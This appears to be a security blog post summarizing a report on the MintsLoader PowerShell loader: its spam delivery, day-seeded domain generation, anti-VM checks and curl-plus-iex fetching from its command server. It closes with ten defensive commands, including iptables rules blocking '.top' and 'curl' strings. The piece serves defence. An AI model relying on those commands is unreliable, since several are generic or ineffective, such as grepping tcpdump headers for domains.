Listen to this Post
2025-02-13
In early January 2025, researchers identified a malicious campaign involving MintsLoader, a PowerShell-based malware loader. This loader was observed delivering secondary payloads such as the Stealc information stealer and the Berkeley Open Infrastructure for Network Computing (BOINC) client. The initial infection vector involved spam emails containing links to malicious pages or attached JScript files. Upon execution, these scripts initiated a sequence leading to the download and execution of MintsLoader.
Notably, MintsLoader employs a Domain Generation Algorithm (DGA) to create dynamic C2 domains, enhancing its ability to evade detection. Additionally, it incorporates anti-virtual machine techniques to avoid analysis in sandbox environments. The campaign primarily targeted organizations in the United States and Europe, including sectors such as Electricity, Oil & Gas, and Legal Services.
ADAPTIVE C2 STRATEGY
MintsLoader uses a DGA that uses a seed value consisting of the current day of the month plus a constant in a loop. The loop is iterated 15 times over and the System[.]Random object and Next method are utilized as indexes into the character array “abcdefghijklmn”. Finally, the resulting C2 domain is appended with the TLD of the C2 server ([.]top).
A string containing part of the URI path is then built from a random ascii-numeric character array with a length of 10 characters using the Get-Random cmdlet. This is used as part of the full C2 URI path.
The query parameters are built first by getting the computer name via the environment variable ComputerName, which is used as the value for the id query parameter, the aforementioned $key variable is used as the value for the key query parameter, and the s query parameter contains a hard-coded number, e.g., 527.
The curl command is used again to invoke the request to the C2 and the response from the C2 is invoked again via iex.
Report: https://lnkd.in/d7_SVwSa
What Undercode Say
MintsLoader represents a sophisticated evolution in malware tactics, leveraging PowerShell’s flexibility and the inherent randomness of Domain Generation Algorithms (DGAs) to maintain persistence and evade detection. The use of DGAs is particularly concerning as it allows the malware to dynamically generate command-and-control (C2) domains, making it harder for traditional security measures to block malicious traffic. The integration of anti-VM techniques further complicates analysis, as it prevents researchers from studying the malware in controlled environments.
To defend against such threats, organizations should adopt a multi-layered security approach. This includes deploying advanced threat detection systems capable of identifying and mitigating PowerShell-based attacks, as well as implementing robust email filtering solutions to block phishing attempts. Additionally, regular employee training on recognizing suspicious emails and attachments is crucial.
From a technical standpoint, understanding the inner workings of MintsLoader can aid in developing countermeasures. For instance, monitoring PowerShell activity for unusual patterns, such as the use of Get-Random or System[.]Random, can help detect potential malware execution. Similarly, tracking outbound network traffic for connections to newly registered domains or unusual TLDs like .top can provide early warning signs of compromise.
Here are some practical commands and techniques to enhance your cybersecurity posture:
1. Monitor PowerShell Activity:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -match "Get-Random" }
2. Block Suspicious TLDs:
iptables -A OUTPUT -p tcp --dport 80 -m string --string ".top" --algo bm -j DROP
3. Analyze Network Traffic:
tcpdump -i eth0 -n 'tcp port 80' | grep -E '.top'
4. Detect Anti-VM Techniques:
Get-WmiObject -Query "SELECT * FROM Win32_ComputerSystem" | Select-Object Model, Manufacturer
5. Enhance Email Security:
postconf -e "smtpd_recipient_restrictions = reject_unauth_destination, check_policy_service unix:private/policy"
6. Sandbox Analysis:
cuckoo submit --url http://example.com/malicious.js
7. Harden System Environment:
sysctl -w kernel.randomize_va_space=2
8. Monitor Environment Variables:
Get-ChildItem Env: | Where-Object { $_.Name -eq "ComputerName" }
9. Block Curl Commands:
iptables -A OUTPUT -p tcp --dport 80 -m string --string "curl" --algo bm -j DROP
10. Regular System Audits:
lynis audit system
By combining these technical measures with a proactive security strategy, organizations can better defend against advanced threats like MintsLoader. Continuous monitoring, regular updates, and a culture of security awareness are essential components of a robust cybersecurity framework.
For further reading and resources, consider the following links:
– MITRE ATT&CK Framework
– SANS Institute Malware Analysis
– OWASP PowerShell Security
Stay vigilant and keep your systems secure.
References:
Hackers Feeds, Undercode AI
